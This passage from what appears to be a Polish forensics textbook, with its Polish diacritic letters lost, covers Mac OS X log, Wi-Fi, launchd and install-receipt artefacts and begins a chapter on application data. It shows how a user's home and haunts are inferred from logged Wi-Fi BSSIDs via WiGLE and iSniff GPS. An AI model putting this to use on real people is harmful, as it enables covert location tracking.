odtworzenie przedstawionego procesu. Ponisze zapisy z dziennika ilustruj ponowne uruchamianie
usug (zwr uwag na znaki plus w drugim wpisie):
Jan 23 20:11:50 planck kernel[0]: Ethernet [AppleBCM5701Ethernet]:
Link up on en0, 1-Gigabit, Full-duplex, Symmetric flow-control,
Debug [796d,2321,0de1,0300,cde1,3c00]
Jan 23 20:11:50 planck.local configd[17]: network changed:
v4(en0+:10.1.4.105) DNS+ Proxy+ SMB+
Jan 23 20:11:50 planck.domainname.net configd[17]:
setting hostname to "planck.domainname.net"
Jan 23 20:12:42 planck.local com.apple.usbmuxd[77]:
SendAttachNotification Device
88:53:95:12:60:1c@fe80::8a53:95ff:fe12:601c._apple-mobdev2._tcp.local.
has already appeared on interface 5. Suppressing duplicate
attach notification.
Bardzo ciekawy jest ostatni wpis, przesany przez usug usbmuxd. Dowiadujemy si z niego,
e gdy laptop odzyska dostp do sieci, ponownie poczy si z urzdzeniem przenonym firmy
Apple, z ktrym by sparowany za pomoc iTunes. Adres MAC tego urzdzenia to 88:53:95:12:60:1c.
Otrzymalimy wskazwk, e w uyciu s dodatkowe platformy i powinnimy zastanowi si,

jak dosta si do kopii zapasowych tego urzdzenia, ktre prawdopodobnie s przechowywane
w systemie.
Nastpny przykad pochodzi z dziennika o wszystko mwicej nazwie wifi.log z katalogu
/private/var/log. Wczeniej pisalimy o usudze o nazwie airportd. Jak nietrudno si domyli,
dziennik Wi-Fi tej usugi zawiera zdarzenia skojarzenia na podstawie protokou IEEE 802.11.
W poniszym wycinku wida seri skojarze z siedmiodniowego okresu:
Fri Feb 28 16:45:09.515 <airportd[118]> _doAutoJoin:
Already associated to "driver8". Bailing on auto-join.
Sat Mar 1 18:53:39.742 <airportd[118]> _doAutoJoin:
Already associated to "Aloft_guest". Bailing on auto-join.
Sat Mar 1 18:53:42.285 <airportd[118]> _doAutoJoin:
Already associated to "Aloft_guest". Bailing on auto-join.
Mon Mar 3 08:58:01.455 <airportd[118]> _handleLinkEvent:
Unable to process link event, op mode request returned -3903
(Operation not supported)
Thu Mar 6 08:45:21.143 <airportd[118]> _doAutoJoin:
Thu Mar 6 08:56:45.028 ***Starting Up***
Thu Mar 6 08:56:45.577 <airportd[118]> airportdProcessDLILEvent:
en1 attached (up)
Thu Mar 6 10:30:59.470 <airportd[118]> _handleLinkEvent:
WiFi is not powered. Resetting state variables.
Thu Mar 6 12:52:24.435 <airportd[118]> _handleLinkEvent:
Got an error trying to queyer WiFi for power.
Resetting state variables.
Already associated to "Misha's Coffee". Bailing on auto-join.
Dziennik ten zosta utworzony w 2014 roku i przedstawia sekwencj zdarze, w ktrej uytkownik
by poczony z punktem dostpowym driver8 w pitek, Aloft_guest w sobot, znw z driver8
w poniedziaek, a potem z Mishas Coffee w czwartek.
Jak wspomnielimy ju wczeniej, jedn z wielkich zalet firmy Apple jest to, e doskonale
dopracowaa szczegy zwizane z wygod korzystania z jej produktw. Zatem teraz przyjrzymy si
innym plikom, aby dowiedzie si, czy airportd lub inny demon zarejestrowa informacje
zwizane z przedstawionymi wpisami z dziennika wifi.log. Wczeniej napisalimy, e airportd
prowadzi list skojarze protokou 802.11 w pliku
/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist. Zajrzymy do tego
pliku, aby sprawdzi, czy zawiera dodatkowe informacje o poznanych przez nas punktach
dostpowych.
Za pomoc polecenia plutil -p szybko znajdziemy potrzebne wpisy. Z poniszego wycinka

dowiadujemy si, e punkt dostpowy driver8 ma identyfikator BSSID (czyli adres MAC punktu
dostpowego) c0:c1:c0:15:6e:e2:
"CachedScanRecord" => {
"SSID_STR" => "driver8"
"WPS_PROB_RESP_IE" => {
"IE_KEY_WPS_RESP_TYPE" => 3
"IE_KEY_WPS_MODEL_NAME" => "WNDR4500"
"IE_KEY_WPS_SERIAL_NUM" => "4536"
"IE_KEY_WPS_RF_BANDS" => 3
"IE_KEY_WPS_DEV_NAME" => "driver8"
"IE_KEY_WPS_MANUFACTURER" => "NETGEAR, Inc."
}
"BEACON_INT" => 100
"AGE" => 0
"RSSI" => -86
"BSSID" => "c0:c1:c0:15:6e:e2"
"AP_MODE" => 2
"SSID" => <64726976 657238>
"CHANNEL" => 6
}
Nastpnie znajdujemy te identyfikatory SSIDs punktw dostpowych Aloft_guest i Mishas

Coffee, czyli 00:1a:1e:ce:d9:10 i 84:1b:5e:f7:25:e1. Majc te informacje, moemy wyledzi miejsca
odwiedzane przez system w cigu ostatnich siedmiu dni. Dziki danym zdobytym w takich
portalach jak Wireless Geographic Logging Engine i narzdziom typu iSniff GPS moemy
stwierdzi, e uytkownik ten prawdopodobnie mieszka w Arlington w Wirginii w USA, bywa
w National Harbor i Old Town w Alexandrii oraz jest fanem zespou R.E.M. W tradycyjnym
ledztwie, w ktrym bardziej interesujce s czynnoci wykonywane przez uytkownika ni
intruza, informacje te mona by byo wykorzysta przy przegldaniu osi czasu i innej treci
wygenerowanej przez uytkownika.
W INTERNECIE
iSniff GPS github.com/hubert3/iSniff-GPS
Wireless Geographic Logging Engine wigle.net
Zadania zaplanowane i usugi

Firma Apple zamienia tradycyjne systemy rc i CRON na usug launchd. Ju od pewnego czasu
firma ta odchodzi coraz dalej od tradycyjnego narzdzia cron. Narzdzie launchd ma kilka zalet,
m.in. wykrywa, czy komputer zostaje wyczony, czy tylko upiony oraz na podstawie tych
informacji odpowiednio zmienia plan wykonywania zada. Ponadto program ten umoliwia
wyzwalanie zdarze na podstawie czynnikw innych ni tylko czas.
Dowody
Wszystkie ustawienia konfiguracyjne launchd s przechowywane w formacie XML w piciu
katalogach, ktrych lista znajduje si poniej (lista ta pochodzi z dokumentacji programu).
~/Library/LaunchAgents Per-user agents provided by the user.
/Library/LaunchAgents Per-user agents provided by the administrator.
/Library/LaunchDaemons System-wide daemons provided by the administrator.
/System/Library/LaunchAgents Per-user agents provided by Mac OS X.
/System/Library/LaunchDaemons System-wide daemons provided by Mac OS X.
Ponadto polecenie, ktre steruje narzdziem launchd, czyli launchctl, prowadzi list polece
do wykonania przy starcie. Odpowiednie pliki konfiguracyjne to:
$HOME/.launchd.conf
/etc/launchd.conf
Katalogi LaunchDaemons zawieraj pliki definicji w formacie XML dla usug, np. sshd i Apache.
Katalogi LaunchAgent zawieraj pliki definicji dziaa typu CRON. Zadania zaadowane do launchd
s traktowane jako aktywne. Opcje zapisane w pliku XML okrelaj czas wykonania danych
czynnoci. Klucz StartCalendarInterval jest rwnowany z normalnym CRON. W dokumentacji
pliku launchd.pslist znajduje si lista wszystkich kluczy listy wasnoci. Poniej przedstawiamy
tylko kilka najbardziej interesujcych wasnoci dotyczcych LaunchAgents.
KeepAlive wasno ta nakazuje programowi launchd sprawdzenie, czy proces
jest utrzymywany w aktywnoci w okrelonych warunkach. Mona j wykorzysta
do ponownego uruchamiania zada, gdyby z jakiego powodu zostay wyczone.
WatchPaths launchd uruchomi zadanie, jeli zmieni si cieka.
StartOnMount zadanie jest uruchamiane po udanym zamontowaniu systemu plikw.
ExitTimeout launchd moe wymusi zakoczenie procesu, jeli przekroczy on okrelony
czas dziaania.
Demony LaunchDaemons s podobne do plikw kontroli wykonywania, tylko maj szerszy
wachlarz moliwoci. Oprcz wymienionych wasnoci, mona te ustawia opcje gniazdowe
oraz publikowa ogoszenia za pomoc usugi Bonjour.
Uwaga Bonjour to opracowana przez firm Apple implementacja technik Zero Configuration Networking
umoliwiajca systemom ogaszanie dostpnoci usug w lokalnej sieci. To wanie dziki temu
wiele aplikacji tej firmy wykrywa znajdujce si w pobliu urzdzenia i osoby, np. drukarki,
skanery i uytkownikw iChata.
Analiza
Pliki konfiguracji usug dla LaunchAgents i LaunchDaemons s w formacie XML, wic ich analiza
nie nastrcza adnych problemw. Podczas szukania w nich ladw utrwalenia szkodliwych
programw do sprawdzania legalnoci usug mona wykorzysta system plikw i pliki BOM.
Pamitaj, e zarwno LaunchAgents, jak i LaunchDeamons mog uruchamia powok tak samo
atwo jak aplikacje, wic przejrzyj wszystkie pary klucz-warto programu.
W ramach przykadu legalnej usugi LaunchDaemons przedstawiamy wycinek deklaracji
usugi sshd z folderu /System/Library/LaunchDaemons:
<dict>
<key>Disabled</key>
<true/>
<key>Label</key>
<string>com.openssh.sshd</string>
<key>Program</key>
<string>/usr/libexec/sshd-keygen-wrapper</string>
<key>ProgramArguments</key>
<array>
<string>/usr/sbin/sshd</string>
<string>-i</string>
</array>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>SockServiceName</key>
<string>ssh</string>
<key>Bonjour</key>
<array>
<string>ssh</string>
<string>sftp-ssh</string>
</array>
</dict>
</dict>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<false/>
</dict>
<key>StandardErrorPath</key>
<string>/dev/null</string>
<key>SHAuthorizationRight</key>
<string>system.preferences</string>
<key>POSIXSpawnType</key>
<string>Interactive</string>
</dict>
Powyszy plik XML informuje narzdzie launchd, e usuga sshd jest aktualnie wyczona.
Gdybymy jednak j wczyli, zostaaby ogoszona przez Bonjour jako sftp-ssh.
Instalatory aplikacji
Gdy instalowane s aplikacje, system instalacyjny zapisuje informacje o dwch plikach, ktre
trafiaj na dysk. W katalogu /private/var/db/receipts tworzone s z reguy dwa pliki dla kadej
instalacji lista skadowa BOM (ang. bill of materials), czyli spis wszystkich plikw, oraz plist
zawierajcy dat instalacji, identyfikator pakietu oraz listy kontroli dostpu do cieek. Plik
magazynowy zawiera nazwy plikw, kompletne cieki, metadane systemu plikw oraz 32-bitow
sum kontroln. Poniszy wycinek przedstawia metadane niedawno przeprowadzonej instalacji
programu Autodesk AutoCAD WS:
planck# plutil -p com.autodesk.mac.AutoCAD-WS.plist

{
"PackageVersion" => "2.0.3"
"PackageIdentifier" => "com.autodesk.mac.AutoCAD-WS"
"InstallPrefixPath" => "Applications"
"InstallDate" => 2013-09-13 18:28:48 +0000
"PackageFileName" => "com.autodesk.mac.AutoCAD-WS.pkg"
"InstallProcessName" => "storeagent"
}
Z zawartoci pliku plist dowiadujemy si, e aplikacja zostaa zainstalowana 13 wrzenia

2013 roku. Natomiast w pliku BOM znajdziemy wykaz plikw, ktre zostay dodane do systemu
plikw podczas instalacji programu. Poniej pokazano sze pierwszych linijek tych danych
(cao zajmuje 234 linijki):
planck# lsbom -pfMTSc com.autodesk.mac.AutoCAD-WS.bom

. drwxr-xr-x
./AutoCAD WS.app drwxr-xr-x
./AutoCAD WS.app/Contents drwxr-xr-x
./AutoCAD WS.app/Contents/Info.plist -rw-r--r--
Thu Jul 11 07:25:35 2013 2,303 647692177
./AutoCAD WS.app/Contents/MacOS drwxr-xr-x
./AutoCAD WS.app/Contents/MacOS/AutoCAD WS -rwxr-xr-x
Tue Jul 16 19:36:53 2013 11,630,544 184272354
Powysze dane z pliku BOM pobralimy za pomoc narzdzia o nazwie lsbom. Wywoalimy je
z opcjami f (nazwa pliku), M (tryb pliku), T (sformatowany czas modyfikacji), S (sformatowany
rozmiar) oraz C (suma kontrolna CRC32).
POWTRZENIE ODPOWIEDZI
NA CZSTO ZADAWANE PYTANIA
W tym podrozdziale zastanowimy si nad typowymi sytuacjami, jakie mona spotka podczas
prowadzenia ledztw typu RI. Podobnie jak w rozdziale 12., przedstawiamy kilka problemw i ich
moliwe rozwizania. Na wikszo pyta mona odpowiedzie na wiele sposobw, a metody mog
ulega zmianom wraz z pojawianiem si nowych wersji systemu Mac OS X.
Jakich rde dowodw mona uywa do analizy osi czasowej?
Artefakt rdo informacji czasowych

Wpisy katalogw HFS+ Znaczniki czasu dostpu do pliku, modyfikacji pliku,
zmiany i-wza i utworzenia i-wza
Wpisy w dzienniku systemowym i ASL Czas wygenerowania wpisu
Dzienniki pocze bezprzewodowych Czas wygenerowania wpisu
Indekser Spotlight Znaczniki czasu utworzenia i modyfikacji
Zadania CRON Zaplanowany czas uruchomienia, poprzednie czasy
uruchomienia w dziennikach
Data instalacji systemu operacyjnego Znaczniki czasu dostpu do pliku, modyfikacji pliku,
zmiany i-wza i utworzenia i-wza
Data instalacji aplikacji Pliki BOM
Wpisy OpenBSM Czas wygenerowania wpisu
Pliki plist aplikacji Metadane systemu plikw; daty rejestrowane
przez aplikacje i ustawiane w ich plikach plist
Wersje dokumentu Daty utworzenia wersji
Metadane dokumentu Daty zapisane przez aplikacje w okrelonych typach
plikw danych
Jakie usugi dziaay lub jakie udziay byy dostpne podczas tworzenia obrazu systemu?
Artefakt rdo dowodw

Usugi katalogowe Lista udziaw SMB i AFP
Zawarto katalogu /var/run Pliki stanu i PID
Jakie informacje o systemie mona wydoby ze statycznego obrazu?
Artefakt rdo dowodw

Nazwa hosta systemu /Library/Preferences/SystemConfiguration/preferences.plist
Informacje o wersji systemu /System/Library/CoreService/SystemVersion.plist
Adresy IP Jeli zdefiniowane w preferencjach sieciowych, rdem
jest plik /Library/Preferences/SystemConfiguration/
preferences.plist.
Jeli uywana jest usuga DHCP, rdem jest plik
/private/var/db/dhcpclient/leases/
Data instalacji systemu operacyjnego Data utworzenia pliku /private/var/db/.AppleSetupDone
lub warto InstallDate w pliku /private/var/db/receipts/
com.apple.pkg.InstallMacOSX.plist
Strefa czasowa systemu, podczone /Library/Preferences/.GlobalPreferences.plist. Pamitaj,
drukarki (przez profile kolorw) e jeli uytkownik pozwala usugom lokalizacji
ustawia stref czasow, plik ten zawiera take
szeroko i dugo geograficzn ostatnich lokalizacji
Jakie rda dowodw zawieraj informacje pozwalajce dowie,

e plik by niedawno otwierany?

Plik /Users/username/Library/ Dziesi ostatnio uruchamianych aplikacji, informacje
Preferences/com.apple.recentitems.plist o poczonym serwerze oraz ostatnio uywane
dokumenty
Jakie artefakty dostarczaj dowodw na temat usunitych plikw?

/Users/nazwauytkownika/.Trash Elementy przeniesione do kosza. Jeli kosz zosta
oprniony, folder ten jest pusty. Naley te wiedzie,
e pliki usunite poza Finderem nie trafiaj do kosza,
tylko s natychmiast odczane
Ktre pliki su do podtrzymywania (automatycznego uruchamiania) aplikacji

przy uruchamianiu systemu lub logowaniu uytkownika?

/Library/LaunchAgents Agenty uruchomione przez system lub uytkownika
/System/Library/LaunchAgents
~/Library/LaunchAgents
/Library/LaunchDaemons Demony uruchomione przez system lub uytkownika
/System/Library/LaunchDaemons
~/Library/LaunchDaemons
/Library/StartupItems Stare elementy startowe systemu (z czasw, gdy nie byo
/System/Library/StartupItems jeszcze launchd)
Kto interaktywnie logowa si w systemie? Jakiego dnia i o ktrej godzinie dany uytkownik
logowa si w systemie?

Dzienniki uwierzytelniania Zawarto pliku /var/log/authd.log i dziennikw ASL
znajdujcych si w katalogu /var/log/asl
System plikw Utworzenie katalogu profilu uytkownika
(np. /Users/[nazwauytkownika]) i odpowiednich
podkatalogw. Pliki konfiguracyjne plist powstae
po interaktywnym logowaniu si za pomoc konta
Dane utmp Aktualnie zalogowani uytkownicy i dziaajce procesy
I CO Z TEGO
System Apple Mac OS X sta si podstawowym rodowiskiem pracy w wielu organizacjach i cho
tylko sporadycznie spotyka si go w roli serwera, wiele organizacji korzysta z tej platformy zamiast
systemu Microsoft Windows. Znajdowalimy te komputery we wszystkich dziaach firm, od
tradycyjnego marketingu i sprzeday po inynieri oprogramowania i IT. Liczba niezawodnych
narzdzi do badania tej platformy jest bardzo skromna. Do najlepszych mona zaliczy produkty
firmy BlackBag Technologies, ale na razie najlepszym rozwizaniem jest korzystanie z mniejszych
narzdzi. W wikszoci przypadkw analiz obrazu systemu najlepiej prowadzi w rodowisku
macierzystym lub systemie Linux. W rozdziale tym opisalimy pobienie niektre najbardziej
przydatne rda dowodw; jest ich o wiele wicej, tylko wci czekaj na udokumentowanie.
PYTANIA
1. Podczas ledztwa administrator sieci powiadamia Ci, e system Mac OS X generuje duy
ruch, ktry nie znajduje uzasadnienia w normalnej aktywnoci systemu. Jak zidentyfikujesz
rdo tego ruchu?
2. Jakie pliki pobraby najpierw podczas analizy systemu na ywo, aby wzbogaci rda
danych opisane w rozdziale 7.?
3. Uniksowe polecenie touch umoliwia aktualizowanie czasw dostpu do pliku i jego
modyfikacji. Jakie inne rda danych czasowych mona wykorzysta w celu ustalenia,
czy kto szpera w danych czasowych?
4. Wymie kilka mechanizmw podtrzymania obecnoci, ktre haker moe wykorzysta
w celu zachowania dostpu do zdobytego systemu Mac OS X. Jakich polece podczas
analizy na ywo uyby w celu automatycznego przejrzenia tych mechanizmw?
ROZDZIA 14.
Badanie aplikacji
P
odczas analizowania materiau dowodowego czsto mona odkry lady nienalece do
systemu operacyjnego. W prawie kadym komputerze obecne s dane pozostawione przez
aplikacje uytkownika, takie jak przegldarki internetowe, klienty poczty elektronicznej,
pakiety biurowe i rnego rodzaju komunikatory. Istniej te aplikacje usugowe, takie jak serwery
internetowe, serwery baz danych i serwery poczty elektronicznej, ktre wspomagaj zarwno
aplikacje uytkownika, jak i infrastruktur informatyczn. Te dane czsto stanowi najwaniejsze
rdo dowodw w ledztwie. Dlatego umiejtno rozpoznawania i analizowania danych
z aplikacji jest niezwykle wana.
Jako e twrcy aplikacji maj du swobod w zakresie sposobu przechowywania informacji,
bdziesz mie styczno z wieloma rnymi formatami danych. Niektre aplikacje wykorzystuj
tylko jeden format, podczas gdy inne posuguj si wieloma formatami danych. Twrcy programw
z reguy wybieraj takie formaty, ktre najlepiej odpowiadaj ich potrzebom. Mona spotka
zarwno otwarte formaty darmowe, jak i formaty opracowane przez firmy na wasne potrzeby.
Niektry artefakty aplikacji s niezalene od systemu operacyjnego. Przykadowo pliki historii
niektrych przegldarek internetowych s takie same we wszystkich systemach operacyjnych,
w ktrych si je instaluje. Jest to dla nas korzystne, poniewa czasami moemy posugiwa si
podobnymi narzdziami i technikami do analizy danych aplikacji pochodzcych z rnych
systemw operacyjnych.
Dane aplikacji s bardzo wane, poniewa obok artefaktw systemu operacyjnego stanowi
dodatkowe rdo potencjalnego materiau dowodowego. Wrd aplikacji, ktre najczciej bada
si podczas ledztw, mona wymieni klienty poczty elektronicznej, przegldarki internetowe
i komunikatory internetowe. Oczywicie jest ich o wiele wicej cae ksiki pisze si na temat
analizowania materiau dowodowego pochodzcego tylko z jednej aplikacji. Informacje zdobyte
podczas badania aplikacji mog przyczyni si do rozwizania problemu. W rozdziale tym
opisujemy oglne metody analizowania aplikacji oraz przygldamy si dokadniej popularnym
rodzajom aplikacji i rozwiza. Tak jak w poprzednich rozdziaach, naszym celem nie jest
wyczerpujce opisanie tematu, tylko dostarczenie najbardziej potrzebnych informacji.
CO TO S DANE APLIKACJI
Dane aplikacji to dane tworzone, przechowywane i obsugiwane przez aplikacj. Istnieje wiele
sposobw przechowywania i reprezentacji danych, ktre cigle si zmieniaj. Niektre programy
s w miar stabilne, podczas gdy inne ulegaj radykalnym zmianom z miesica na miesic. Z tego
powodu narzdzia i metody badania aplikacji take mog znacznie si zmieni z czasem. Jako e
nie chcemy zgadywa, jak aplikacje bd wyglday w przyszoci, w rozdziale tym opisujemy nie
tylko konkretne aplikacje, ale i oglne metody ledcze. Najpierw jednak pokazujemy, gdzie programy
przechowuj swoje dane.
ROZDZIA 14. BADANIE APLIKACJI 439
GDZIE APLIKACJE PRZECHOWUJ DANE

Gdy zostanie Ci zlecone zadanie znalezienia w systemie danych aplikacji, pewnie zaczniesz si zastanawia,
od czego zacz. Jak w ogle dowiedzie si, jakie aplikacje s zainstalowane w systemie i gdzie znajduj
si ich dane? Cho aplikacje mog przechowywa dane w dowolnie wybranych miejscach, wikszo
systemw operacyjnych ma pewne ustalone zasady. Ich znajomo umoliwia szybkie znalezienie
najbardziej przydatnych informacji. W kilku poniszych punktach opisujemy metody szybkiego
znajdowania danych aplikacji w systemach Windows, Linux i OS X. Zaczniemy od systemu Windows.
System Windows
W systemach Microsoft Windows jest kilka dobrych miejsc, do ktrych mona zajrze, aby
sporzdzi list potencjalnych tropw. Wprawdzie kady program moe zapisywa swoje dane
w dowolnym miejscu, ale poniej przedstawiamy list miejsc, ktre s wg nas najbardziej warte
sprawdzenia. S to domylne lokalizacje, ktre mog zawiera artefakty nawet po tym, jak program
zostanie odinstalowany, czyli usunity z systemu operacyjnego. Wikszo aplikacji wykorzystuje
jedno, kilka lub wszystkie z wymienionych tu miejsc.
Domylny katalog instalacyjny aplikacji jest to folder, w ktrym podczas instalacji
programu umieszczany jest cay wykonywalny kod. Najczciej folderem tym jest
C:\Program Files. Dobrym pomysem jest posortowanie zawartoci tego katalogu wg daty
modyfikacji lub utworzenia, aby szybko si dowiedzie, kiedy ostatnio zainstalowano lub
zmieniono jak aplikacj. W systemach 64-bitowych istnieje jeszcze dodatkowo folder
C:\Program Files (x86), w ktrym domylnie instalowane s aplikacje 32-bitowe.
Domylne katalogi danych aplikacji aplikacje systemu Windows do przechowywania
danych, np. plikw konfiguracyjnych lub plikw tymczasowych, zazwyczaj wykorzystuj
wsplny katalog. W systemie Windows XP i starszych naley sprawdzi wszystkie
podkatalogi katalogu C:\Documents and Settings\{nazwauytkownika}\Application Data.
W systemie Windows Vista i nowszych naley sprawdzi wszystkie podkatalogi katalogu
C:\ProgramData and C:\Users\{nazwauytkownika}\AppData.
Informacje dotyczce dezinstalacji w rejestrze w rejestrze systemu Windows
znajduje si specjalne miejsce, w ktrym aplikacje mog zaznaczy si do odinstalowania
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. Wikszo kluczy
ma warto o nazwie InstallLocation zawierajc ciek do folderu, w ktrym zostaa
zainstalowana aplikacja. W 64-bitowych wersjach systemu Windows naley sprawdzi
klucz HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall,
ktry zawiera informacje o zainstalowanych aplikacjach 32-bitowych.
Domylne miejsca do przechowywania danych konfiguracyjnych w rejestrze aplikacje
systemu Windows czsto zapisuj informacje konfiguracyjne we wsplnym kluczu rejestru.
Naley sprawdzi wszystkie podklucze klucza HKLM\SOFTWARE. W systemach 64-bitowych
naley te sprawdzi klucz HKLM\SOFTWARE\Wow6432Node, poniewa w nim znajduj
si informacje dotyczce aplikacji 32-bitowych.
System OS X
W systemie Apple OS X aplikacji i ich danych naley szuka w dwch miejscach.
Domylny katalog instalacji aplikacji w systemie OS X programy s domylnie
instalowane w katalogu /Applications. Podobnie jak w systemie Windows, uytkownik
moe te instalowa aplikacje w dowolnie wybranym miejscu.
Dane aplikacji przyporzdkowane do poszczeglnych uytkownikw aplikacje OS X
z reguy zapisuj dane dotyczce poszczeglnych uytkownikw w katalogach znajdujcych si
w profilach tych uytkownikw. Domylna lokalizacja to /Users/{profil}/Library/Application
Support. W katalogu tym wikszo aplikacji tworzy dodatkowy katalog o nazwie takiej samej
jak nazwa aplikacji i zapisuje w nim dane.
System Linux
W systemie Linux miejsce przechowywania danych aplikacji zmienia si w zalenoci od dystrybucji
i zastosowanych w niej indywidualnych ustawie. W systemach tych dane aplikacji znajdujemy na
dwa sposoby. Po pierwsze, rcznie przegldamy system plikw. Po drugie, sprawdzamy meneder
pakietw. Przyjrzymy si obu tym rozwizaniom nieco dokadniej.
Rczne przegldanie systemu plikw moe by bardzo czasochonne i mudne, zwaszcza gdy
nie ma adnych wskazwek. Pomocna moe by znajomo pewnych konwencji przestrzeganych
w wikszoci dystrybucji Linuksa o nazwie FHS (ang. Filesystem Hierarchy Standard). Standard ten
okrela struktur katalogw, jak powinny mie dystrybucje systemu Linux. Dokument ten mona
znale na podanej poniej stronie internetowej.
W INTERNECIE
www.samba.org/~cyeoh
Wikszo dystrybucji przestrzega tylko czci tego standardu, wic dobre tropy powinno si
znale po przejrzeniu nastpujcych lokalizacji.
Systemowe dane konfiguracyjne w wikszoci dystrybucji Linuksa systemowe dane
konfiguracyjne przechowywane s gwnie w katalogach /etc i /usr/local/etc/.
Dane aplikacji poszczeglnych uytkownikw dane tego rodzaju najczciej mona
znale w podkatalogach katalogu gwnego uytkownika, ktrym domylnie jest default
/home/{nazwauytkownika}.
Lokalizacje plikw wykonywalnych standardowe katalogi, w ktrych mona znale
pliki wykonywalne to /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin oraz /usr/local/sbin.
Oprogramowanie dodatkowe niektre zewntrzne aplikacje i ich dane mona znale
w katalogu /opt.
Czasami potrzebne informacje atwiej znale, wysyajc zapytania do menedera pakietw.

W wikszoci nowoczesnych wersji Linuksa wykorzystywany jest jaki meneder pakietw, ktry
prowadzi baz danych wszystkich zainstalowanych pakietw. Poniej opisujemy dwa najczciej spotykane
narzdzia tego typu oraz ich polecenia umoliwiajce pobranie listy zainstalowanych pakietw.
Dystrybucje oparte na RPM meneder pakietw RPM jest obecny w wielu popularnych
dystrybucjach systemu Linux, z ktrych najbardziej znane to Red Hat Enterprise Linux (RHEL),
CentOS, OpenSUSE oraz Fedora. Pakiety RPM maj domylne rozszerzenie .rpm, a narzdzie
wiersza polece tego menedera nazywa si rpm. Poniej znajduje si najprostsze polecenie
wywietlajce list wszystkich zainstalowanych pakietw wraz z datami instalacji:
rpm -qa --queryformat
'%{name}-%{version}-%{release} %{installtime:date}\n'
W niektrych dystrybucjach wraz z rpm uywany jest meneder yum (ang. Yellowdog
Updater, Modified). Systemy z yum zazwyczaj prowadz dziennik /var/log/yum.log,
w ktrym mona znale historyczny rejestr wszystkich zainstalowanych, zmienionych
i skasowanych pakietw.
Dystrybucje oparte na Debianie w tych dystrybucjach wykorzystywany jest meneder
pakietw dpkg, ktrego pakiety maj domylnie rozszerzenie .deb. Dwie popularne dystrybucje
z tym narzdziem to Ubuntu i Knoppix. Aby wywietli prost list zainstalowanych pakietw,
naley wykona nastpujce polecenie:
dpkg --get-selections
Ponadto meneder dpkg prowadzi dziennik /var/log/dpkg.log, cho w wikszoci systemw

podlega on rotacji, wic ma ograniczon warto historyczn. Jeli dziennik ten jest
dostpny, mona w nim znale pewne dodatkowe szczegy, wcznie z dat i godzin
wykonania czynnoci oraz numerem wersji pakietu. Ponadto w systemach Ubuntu obok
menedera dpkg dostpny jest te program Advanced Packaging Tool (apt). Jego dzienniki
mog znajdowa si w katalogu /var/log/apt.
Jeli trzeba zbada obraz systemu wykonany na potrzeby dochodzenia, mona go uruchomi
za pomoc oprogramowania wirtualizacyjnego, np. VMware Workstation lub Oracle VirtualBox.
Pamitaj tylko, by nie podcza maszyny wirtualnej do swojej sieci, poniewa obraz moe zawiera
szkodliwe oprogramowanie.
OGLNE ZASADY BADANIA APLIKACJI

NA POTRZEBY LEDZTWA
Zanim przejdziemy do omwienia konkretnych aplikacji, chcielibymy przedstawi kilka oglnych
metod badania aplikacji i odkrywania pozostawianych przez nie artefaktw. Jest to bardzo przydatna
umiejtno, poniewa aplikacje z czasem si zmieniaj, a poza tym nie moemy opisa w tej
ksice wszystkich istniejcych na wiecie programw. Co wicej, jest wiele aplikacji utworzonych
dla konkretnych jednostek, ktre mona spotka tylko w wybranych dziaach jednej firmy. Dlatego
postanowilimy troch nauczy Ci owi ryby, a nie tylko da Ci gotow ryb na talerzu.
Co zatem mamy na myli, piszc badanie aplikacji na potrzeby ledztwa? W tym przypadku
chodzi o dowiedzenie si, jakie artefakty tworzone przez program mog by przydatne w dochodzeniu.
Jeeli brakuje dobrej dokumentacji programu, moe by konieczne przeprowadzenie wasnych
analiz w celu wykrycia istotnych artefaktw i okrelenia metod ich interpretacji. Jeli dokumentacji
jest bardzo mao albo nie ma jej w ogle, istnieje wiksze ryzyko, e dojdziemy do bdnych wnioskw.
Dlatego w powanych ledztwach, np. w sprawie zgoszenia przestpstwa, dobrym pomysem moe
by wynajcie eksperta od informatyki ledczej. W sprawach lejszej wagi czasami wystarczaj analizy
wykonywane we wasnym zakresie.
Prac najlepiej zacz od sprawdzenia w zasobach spoecznoci informatykw ledczych, co ju
wiadomo na dany temat. Bardzo dobrymi rdami takich informacji s portale Forensic Focus
i Forensics Wiki, a take rne tablice dyskusyjne prowadzone przez programistw aplikacji.
Jeli posiadasz patny program z dziedziny informatyki ledczej, wiele cennych informacji moesz
znale na prywatnych tablicach dyskusyjnych producenta.
W INTERNECIE
Forensics Wiki www.forensicswiki.org
Forensic Focus www.forensicfocus.com
Popularne pakiety oprogramowania ledczego zawieraj funkcje umoliwiajce przetwarzanie

i prezentowanie danych z wielu rnych aplikacji. Dlatego zawsze warto najpierw sprawdzi
moliwoci posiadanych ju programw. Dwa popularne pakiety o duych moliwociach
to EnCase firmy Gudiance Software i FTK firmy AccessData.
W INTERNECIE
EnCase www.encase.com/products/Pages/encase-forensic/overview.aspx
FTK www.accessdata.com/products/digital-forensics/ftk
Jeli w tych zasobach nie znajdziesz potrzebnych informacji, moe pozosta Ci ju tylko
przeprowadzenie bada i testw na wasn rk. Miej tylko przez cay czas na uwadze, jakiego rodzaju
spraw si zajmujesz i jakie implikacje bdzie miao ewentualne niepowodzenie Twoich dziaa.
Czynnoci zwizane z badaniem aplikacji w pewnym stopniu pokrywaj si z procedurami
sortowania szkodliwego oprogramowania. Nie jest to chyba wielkim zaskoczeniem, poniewa
jednym z gwnych celw sortowania szkodliwych programw jest dowiedzenie si, co dokadnie
robi. Tylko w tym przypadku sprawa dotyczy legalnej aplikacji, a nie jakiego wirusa.
Zastosowanie ma tu wiele technik opisanych w rozdziale 15., w podrozdziaach rodowisko do
sortowania i Analiza dynamiczna. Jeli czytajc ten rozdzia, dojdziesz do wniosku, e brakuje
Ci szczegw, moesz poszuka szerszych informacji w rozdziale 15.
Teraz przyjrzymy si oglnym czynnociom, jakie naley wykona, a potem przeanalizujemy

konkretny przykad.
Konfiguracja rodowiska bardziej szczegowo temat ten opisujemy w rozdziale 15.,
w podrozdziale rodowisko do sortowania. Oglnie chodzi o przygotowanie
odpowiedniego rodowiska do przeprowadzenia bada. Podobnie jak przy analizowaniu
szkodliwych programw, prawdopodobnie bdzie trzeba wielokrotnie wykonywa testy.
